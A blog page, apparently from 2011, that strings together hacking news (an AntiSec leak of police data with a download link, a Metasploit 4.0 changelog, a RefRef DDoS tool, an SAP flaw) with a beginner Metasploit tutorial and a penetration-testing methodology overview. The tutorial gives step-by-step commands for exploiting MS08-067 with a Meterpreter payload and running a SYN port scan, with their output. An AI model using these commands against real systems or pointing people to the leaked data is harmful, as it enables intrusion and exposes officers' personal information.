AntiSec ackers once again leak a huge data of 10GB at https://vv7pabmmyr2vnflf.tor2web.org/ , hacked from 70 law enforcement agencies. The leak contain hundreds of compromising email spools, personal information about officers, police training videos, and the contents of insecure anonymous tip systems.Also Over 300 mail accounts from 56 law enforcement domains. Missouri Sheriff account dump (mosheriffs.com)7000+ usernames, passwords, home addresses, phones and SSNs. Online Police Training Academy filesPDFs, videos, HTML . Plesk plaintext server passwords (ftp/ssh, email, cpanel, protected dirs).files.
Stolen Credit Card information from mosheriffs.com online store also leaked on Pastebin
“The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool . The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and nop slide generators can be mixed and matched with exploit modules to solve almost any exploit-related task.“
Official Change LOG
Statistics:
Metasploit now ships with 716 exploit modules, 361 auxiliary modules, and 68 post modules.
20 new exploits, 3 new auxiliary modules, and 14 new post modules have been added since the last release (3.7.2)
New Modules since 3.7.2: New Exploit Modules:
VSFTPD v2.3.4 Backdoor Command Execution
Java RMI Server Insecure Default Configuration Java Code Execution
HP OpenViewNetwork Node Manager Toolbar.exe CGI Buffer Overflow
Feature #4982 – Support for custom executable with psexec
Feature #4856 – RegLoadKey and RegUnLoadKey functions for the Meterpreter stdapi
Feature #4578 – Update Nmap XML parsers to support Nokogiri parsing
Feature #4417 – Post exploitation module to harvest OpenSSH credentials
Feature #4015 – Increase test coverage for railgun
Bug #4963 – Rework db_* commands for consistency
Bug #4892 – non-windows meterpreters upload into the wrong filename
Bug #4296 – Meterpreter stdapi registry functions create key if one doesn’texist
Bug #3565 – framework installer fails on RHEL (postgres taking too long to start)
Armitage: Armitage integrates with Metasploit 4.0 to:
Take advantage of the new Meterpreter payload stagers
Crack credentials with the click of a button
Run post modules against multiple hosts
Automatically log all post-exploitation activity
Revision Information:
Framework Revision 13462
Several import parsers were rewritten to use Nokogiri for much faster processing of large import files. Adding to Metasploit’s extensive payload support, Windows and Java Meterpreter now both support staging over HTTP and Windows can use HTTPS. In a similar vein, POSIX Meterpreter is seeing some new development again. It still isn’t perfect nor is it nearly as complete as the Windows version, but many features already work. Java applet signing is now done directly in Ruby, removing the need for a JDK for generating self-signed certificates. The Linux installers now ship with ruby headers, making it possible to install native gems in the Metasploit ruby environment.
Another flexibility improvement comes in the form of a consolidated pcap interface. The pcaprub extension ships with the Linux installers as of this release and support for Windows will come soon. Modules that used Racket for generating raw packets have been converted to Packetfu, which provides a smoother API for modules to capture and inject packets.
Previously you saw the source code of XerXes by The Jester. The Anonymous Team Have Also Developed their own DDoS tool which is said to exploit SQL vulnerabilities to support the group's future campaigns. Previously they had been using LOIC for many of their operation . But due to this tool many of the Anonymous got caught may the tool was not capable of hiding their tracks . So this time they made their own.
According to Developer "RefRef is a revolutionary DoS java site. Basically, by using an SQL and .js vulnerability, you can send a page request packet from your home computer with embedded .js file, because of the vulnerability in the SQL/Javascript engine on MOST websites, the site actually TEMPs the .js file on its own server. So now the .js is in place on the host of the site. Next since you still have the request, it picks up the .js file, and all of the requesting for packets power happens on the server, not the requestee. I send two packets from my iphone, and everything else happens on the server. Basically eats itself apart, because since both are on the server, its all a local connection."
This DDOS tool #RefRef s set to be released in September, according to an Anon promoting it on IRC this afternoon Developed with JavaScript, the tool is said to use the target site’s own processing power against itself. In the end, the server succumbs to resource exhaustion due to #RefRef’s usage. An attack vector that has existed for some time, resource exhaustion is often skipped over by attackers who favor the brute force of a DDoS attack sourced from bots or tools such as LOIC.
The tool is very effective, a 17-seconds attack from a single machine resulting in a 42-minute outage on Pastebin yesterday. The Pastebin Admins Weren't happy and tweeted
The effectiveness of RefRef is due to the fact that it exploits a vulnerability in a widespread SQL service. The flaw is apparently known but not widely patched yet. The tool's creators don't expect their attacks to work on a high-profile target more than a couple of times before being blocked, but they don't believe organizations will rush to patch this flaw en masse before being hit.
This means there are a lot of possible targets out there that will be hit at least once. "This tool only makes you vulnerable if you don't keep your systems patched, perform the basic security, which is how Sony got caught with it's pants down," the RefRef developers said.
The tool works by turning the servers against themselves. It sends malformed SQL queries carrying the payload which in turn forces the servers to exhaust their own resources. However, the tool's GUI does have a field for inputting the refresh interval so it might combine traditional forms of HTTP hammering with the new technique. Some security experts have been skeptical that the success of Anonymous's DDoS attacks can be explained through LOIC alone. They proposed that some of the group's supporters also have access to botnets, a theory that has partially proven to be correct.
On the 4th of august at the world’s largest technical security conference – BlackHat USA 2011, which will take place in Las Vegas, SAP security expert and CTO of ERPScan Alexander Polyakov will show how any malicious attacker can get access to the systems running on SAP via Internet using new critical vulnerability.
SAP systems are used in more than 100 000 world companies to handle business-critical data and processes. Almost in each company from Forbes 500 system data are set for the handling of any process beginning from purchasing, human resources and financial reporting and ending with communication with other business systems. Thus receiving an access by the malicious attacker leads to complete control over the financial flow of the company, which can be used for espionage, sabotage and fraudful actions against hacked company.
The given attack is possible due to dangerous vulnerability of the new type, detected by Alexander in J2EE engine of SAP NetWeaver software, which allows bypassing authorization checks. For example it is possible to create a user and assign him to the administrators group using two unauthorized requests to the system. It is also dangerous because that attack is possible on systems, protected by the two-factor authentication systems, in which it is needed to know secret key and password to get access. To prove it researchers from ERPScan created a program, which detects SAP servers in the Internet with help of secret Google keyword and checks found servers on potential dangerous vulnerability. As the result, more than half of available servers could be hacked with help of found vulnerability.
“Danger is in that it is not only a new vulnerability, but a whole class of vulnerabilities that was theoretically described earlier but not popular in practice. During our research we only detected several examples in standard system configuration, and because each company customizes the system under its own business processes, new examples of vulnerabilities of the given class can be potentially detected at each company in the future. We have developed a free program which can detect unique vulnerabilities of such type in order to protect companies on time and it is also included in our professional product – ERPScan Security Scanner for SAP.” — noted Alexander.
This may vary in your metasploit according to your version.
The Basic use of metasploit
1. Pick which exploit to use 2. Configure the exploit with remote IP address and remote port number 3. Pick a payload 4. Configure the payload with local IP address and local port number 5. Execute the exploit
Now time for a example
Type "show exploits" see the list of exploits available. Many of the exploits listed here are going to work against the target servers.But the difficult part is to know if the exploits will work or not =P
I will use
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) >
Now time to see the exploit commands we type "help"
msf exploit(ms08_067_netapi) > help
Many commands arrives but i needed to check the exploits commands :( Yeh got it it is in the last :)
Exploit Commands ================
Command Description ------- ----------- check Check to see if a target is vulnerable exploit Launch an exploit attempt rcheck Reloads the module and checks if the target is vulnerable reload Just reloads the module rexploit Reloads the module and launches an exploit attempt
Now it is time to see some information about the exploit
type "info" to see this all magic happen
you will see many information about the exploit like name,version,available targets etc
in the above we were just seeking at the information about the exploit but the original stunt now comes
We will set the payload that will work after the exploitation is successful
To see the available payloads type "show payloads"
Now we will select a payload i prefer windows/meterpreter/bind_tcp
msf > exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp
type " show options " to see all available options that we have to fill up.
We need to set the RHOST ( The Victim ). We type set RHOST xxx.xxx.xxx.xxx ( X - The Ip Adreess) Now when you type show options you will see the RHOST will be filled with the ip address :)
The options varies from exploit to exploit sometimes it may even ask LHOST which you have to fill by your local ip or your computer ip that is also same you have to type set LHOST xxx.xxx.xxx.xxx
The 'set' command allows you to configure Framework options and parameters for the current module you are working with.
after all the options are filled up time to check the host before trying exploit it ..
We have a system, we have an exploit. Are we going to be able to compromise the system? Now is the time to find out. To perform the check type "check ". This may not work on all exploits. This will see if the server or target appears vulnerable. For some exploits you might have to provide information about what type of system to compromise. With the attack listed above this is not necessary
Now if you are sure all things went right type the command " exploit "
If successful you will see something like ( Appropriate )
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English [*] Selected Target: Windows XP SP0/SP1 Universal [*] Triggering the vulnerability... [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:51333 -> xxx.xxx.xxx.xxx:4444)
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show payloads msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > set RHOST [TARGET IP] msf exploit(ms08_067_netapi) > exploit
Now you own the PC it is yours you can do any thing with it i will not explain those here because another article wants it
The article is becoming longer . I have to make you understand auxiliary , nops and encoders in brief
The Auxiliary modules perform scanning, fuzzing, sniffing, information gathering and much more . This module does not give you a shell but they are equally important as the exploit and payloads.
I will take offensive security's help i cant write so much my hand is paining
Auxiliary Example
Port Scanning
In addition to running Nmap, there are a variety of other port scanners that are available to us within the framework.
Name Description ---- ----------- scanner/portscan/ack TCP ACK Firewall Scanner scanner/portscan/ftpbounce FTP Bounce Port Scanner scanner/portscan/syn TCP SYN Port Scanner scanner/portscan/tcp TCP Port Scanner scanner/portscan/xmas TCP "XMas" Port Scanner
The Result
msf > use auxiliary/scanner/portscan/syn msf auxiliary(syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to scan per set INTERFACE no The name of the interface PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS yes The target address range or CIDR identifier SNAPLEN 65535 yes The number of bytes to capture THREADS 1 yes The number of concurrent threads TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(syn) > set INTERFACE eth0 INTERFACE => eth0 msf auxiliary(syn) > set PORTS 80 PORTS => 80 msf auxiliary(syn) > set RHOSTS 192.168.1.0/24 RHOSTS => 192.168.1.0/24 msf auxiliary(syn) > set THREADS 50 THREADS => 50 msf auxiliary(syn) > run
[*] TCP OPEN 192.168.1.1:80 [*] TCP OPEN 192.168.1.2:80 [*] TCP OPEN 192.168.1.10:80 [*] TCP OPEN 192.168.1.109:80 [*] TCP OPEN 192.168.1.116:80 [*] TCP OPEN 192.168.1.150:80 [*] Auxiliary module execution completed
The simplified NOP mixin provided in Msf::Simple::Nop extends each nop module instance with a method called generate_simple. This method takes the length of the sled to generate and the hash of options that should be used for the generation. On success, the return value is a buffer that is encoded using the Msf::Simple::Buffer class using the format specified in the option hash as the ’Format’ element. If no format is specified, the raw version of the NOP sled is returned.
Encoders
Encoder modules are used to generate transformed versions of raw payloads in a way that allows them to be restored to their original form at execution time and then subsequently executed. To accomplish this, most encoders will take the raw form of the payload and run it through some kind of encoding algorithm, like bitwise XOR. After the encoded version is generated, a decoding stub is prefixed to the encoded version of the payload. This stub is responsible for performing the inverse operation on the buffer attached to the decoder when it executes. After the decoder restores the payload to its original form, it will transfer execution to the start of the now normalized payload. To support the above described encoder model, the Metasploit framework provides the Msf::Encoder class which inherits from the Msf::Module base class. All encoders must inherit from the Msf::Encoder class at some level to ensure that encoder-specific methods are included in the derived class. Like the module information hash, encoders have some specialized information hash elements that describe information about the encoder being used. The information that encoder modules need to describe are the attributes of the decoder which is conveyed through the Decoder information hash element. The Decoder hash element references another hash that contains decoder specific properties. These are described in the table shown in figure 6.3 along with their types and module instance accessors.
Explaining NOPS and Encoders will make newbies confuse. So i will explain these latter
This is just the basic usages and was totally written for beginners more advance information about metasploit is waiting to be posted.
Replies , Questions and Suggestion regarding this topic is welcomed
This article is just to give you the Basic knowledge and making you understand the Fundamentals of Penetration Testing
Goal of this Article
q
An overview of how Vulnerability Assessment (VA) & Penetration Testing (PT) is done
qDefining scope of the assessment
qTypes of Penetration Testing
qA brief understanding on how Buffer Overflow works
qHow vulnerabilities are scanned and exploited
qWhat are the end results
qWhat a Penetration Testing Report should contain
Differentiating VA and PT
Vulnerability Assessment (VA)
In this case the security auditor has to only scan for the vulnerabilities in the server or application and filter out the false positives from the scan output by mapping them with the actual vulnerabilities associated with the target host.
VA Scope Includes:
• The VA test can be done both internally and externally
• No vulnerabilities are exploited
• No dangerous attacks like DOS and Buffer Overflow attacks are used
• Automated vulnerability scanning tools line Nessus, Retina or ISS are used
Penetration Testing (PT)
In this case the security auditor or the penetration tester not only has to scan for the vulnerabilities in the server or application but also has to exploit them to gain access to the remote server.
PT Scope Includes:
• The PT test is done both internally and externally
• Vulnerabilities are exploited
• Dangerous attacks like DOS and Buffer Overflow attacks are used depending upon
the customer’s willingness to do so
• Automated vulnerability scanning tools and as well as exploits are used
Types Of Penetration Testing
Black Box Penetration Testing
Pen tester has no previous knowledge of the remote network
• Simulating a real world hacking by a hacker who has no knowledge
(E.g. Operating System running, application running, device type and
network topology etc..) of the remote network environment
White Box Penetration Testing
• Have the knowledge of the remote network
•Type of Pen tester network devices (i.e. Cisco gear, TCP/IP),
•WebServer details (i.e., Apache/*nix or Apache/Win2k),
•Operating System type (i.e., Windows/*nix),
•Database platform (i.e., Oracle or MS SQL),
•Load balancers (i.e. Alteon),
Firewalls (i.e. Cisco PIX).. etc
•Simulating a attack by a hacker who is having a detailed knowledge of the remote network environment
Scope Of Penetration Testing
Non-Destructive Test
•Scans the remote hosts for possible vulnerabilities
•Analyze and confirm the findings
•Map the vulnerabilities with proper exploits
•Exploit the remote system with proper care to avoid disruption of service
•No highly critical Denial of Service (DoS) attack is tried
Destructive Test
•Scans the remote hosts for possible vulnerabilities
• Analyze and confirm the findings
• Map the vulnerabilities with proper exploits
•All highly critical Denial of Service (DoS) attacks (e,g like buffer overflows are tried
~~~ Moving On To Penetration Testing ~~~
Penetration testing includes some steps ...
qFingerprinting or Footprinting
qNetwork Information Gathering
qSurveying / Network Mapping
qPorts Scanning and Services Identification
qEvading Firewall Rules
qAutomated Vulnerability Scanning
qExploiting Services for Known Vulnerabilities
qExploiting Web-Based Authorization
qPassword Cracking / Brute Forcing
qDenial of Services (DoS) Testing
qEscalation of Privileges
FLOW CHART
1. Information Gathering
This is the first step for any remote host Penetration Testing. Here the pen-tester try to gather maximum information on the remote host to precise the attack.
Expected Results:
qZone Transfer Information
q Domain Registration Information
q Email IDs
q IP Addresses Range
Sample Screenshot (Server queried for Zone-Transfer Info):
(Information Gathered from Zone-Transfer Info)
2. Footprinting / Fingerprinting
In this step, information like WebServer and OS type running on remote host are gathered to further precise the attack.
A network survey serves often as an introduction to the systems to be tested. It is best defined as a combination of data collection, information gathering, and policy control.
Expected Results:
qFirewall / Routers / IDS Discovery
qPossible Local Network / Subnet Discovery
qIP Addresses Range
qNetwork Topology Mapping
qISP information
Sample Screenshot (Local address of the remote network discovered):
4. Port Scanning & Services Identification
Port scanning is the invasive probing of system ports on the transport and network level. This module is to enumerate live or accessible Internet services as well as penetrating the firewall to find additional live systems.
Expected Results:
qOpen, closed or filtered ports
qServices Identification
Sample Screenshot (NMAP port scan output):
5. Evading Firewall Rules
In this phase, firewall evasion techniques are used to bypass firewall rules. This can further help in port scanning, remote host detection and remote network discovery.
Expected Results:
q Mapping of firewall configuration rules
q Partial Access to devices behind the firewall
Sample Screenshot : (Trace Route using UDP packets)
It is clear from the two screenshots that the packet filtering device (i.e. Firewall / Router) is not configured to block UDP packets.
6. Automated Vulnerability Scanning
The focus of this module is identifying, understanding, and verifying the weaknesses, misconfigurations and vulnerabilities associated with remote host. The scanning is done using automated tools or scripts to make the process faster.
Expected Results:
qList of vulnerabilities associated with each remote services
qList of possible denial of service vulnerabilities
qPossible misconfiguration on the remote server
Sample Screenshot
What is MVS ?
MVS is an automated Internet Vulnerability Scanner which can scans for web based vulnerabilities (Ex: CGI/IIS Unicode) associated with a remote host running a web server. The scanner displayed, shows that the target host is vulnerable to IIS Unicode. The vulnerable string has been highlighted in the below screen shot
7. Exploiting Services For Known Vulnerabilities
This is the most important phase of penetration testing. Here the weaknesses found in the remote services are exploited using openly available exploits or self developed or customized exploits.
Here the web application flaws are exploited to gain access to restricted information. The Web-Based authentication is exploited by using XSS (Cross-Site Scripting) or SQL injection or MITM (Man-in-the-middle) attacks etc...
Expected Results:
qAccess to restricted / confidential information
q Control over web configuration
q Can also leads to gaining access over other servers
Sample Screenshot (SQL injection used for gaining access to admin page):
8. Password Cracking or Brute Forcing
Password cracking is the process of validating password strength through the use of automated password recovery tools that expose either the application of weak passwords due to human factors.
Password Lists and Words List are use for validating the password in this process
Denial of Service (DoS) is a situation where the applications or services running over the remote system stops functioning and prevents authenticated network users or devices to access it.
Expected Results:
Disruption of Services
q List of other possible DoS vulnerable associated with the systems
qSabotage of remote network
Sample Screenshot (DOS attack for CISCO):
10. Escalation of Privileges
Escalation of Privileges is the type of rights the attacker gains over the remote system. It is the final stage of the remote host hacking where the attacker gains complete control over the remote system.
Expected Results:
q Gain administrator / super user rights
q Gain privilege to retrieve or modify confidential data
